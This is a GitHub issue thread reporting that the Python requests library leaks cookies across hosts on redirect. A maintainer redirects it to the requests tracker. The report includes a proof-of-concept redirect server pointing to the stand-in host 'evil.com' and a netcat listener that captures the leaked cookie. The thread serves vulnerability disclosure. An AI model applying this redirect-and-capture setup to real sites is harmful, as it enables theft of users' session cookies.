### ISSUE TITLE
Python Request Module Leaks Cookies on Redirect to Other hosts

### ISSUE THREAD

**Issue by blind-intruder** [python/cpython#92076]
# Issue Definition

> Python requests module leaks the cookies upon redirection to the other hosts. Let say if I make request to domain.com with cookies using requests module and domain.com redirects to evil.com, then requests module will attach cookies of domain.com to the request for evil.com which results as cross domain cookies leakage and this is a security issue.

## How to Reproduce

*) Resolve domain.com & evil.com to 127.0.0.1 using /etc/hosts
*) Start a python http server for domain.com and redirect every request to evil.com
*) Listen on some port for evil.com using nc
*) Send a request to domain.com using python requests module.

### Start http server for domain.com
```
#!/usr/bin/env python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
	def do_GET(self):
		self.send_response(301)
		self.send_header('Location', "http://evil.com:8083")
		self.end_headers()

HTTPServer(("", 8004), Redirect).serve_forever()
```

### Listen for evil.com using NC

```
nc -nvl 127.0.0.1 8083
```

### Send request

```
import requests
cookies = {"secret": "secret_cookie_value"}
r=requests.get('http://domain.com:8004',cookies=cookies)
```

*) After sending request, see the NC output and observer that the request for evil.com contains cookies of domain.com

## How to FIx?
> Add a condition to check origins before redirection and make sure cookies don't get attached to different origins(domains).

### For more details watch this video
https://drive.google.com/file/d/1aOIqFLZzalbRFGEeqC5eje6-wXFzlv4R/view

**Comment by hugovk** [comment]
Thanks for the report, however this tracker is for CPython itself.

Requests is a third-party library, please report Requests bugs to their own tracker:

https://docs.python-requests.org/en/latest/dev/contributing/#bug-reports

**Comment by blind-intruder** [comment]
Oh, My bad
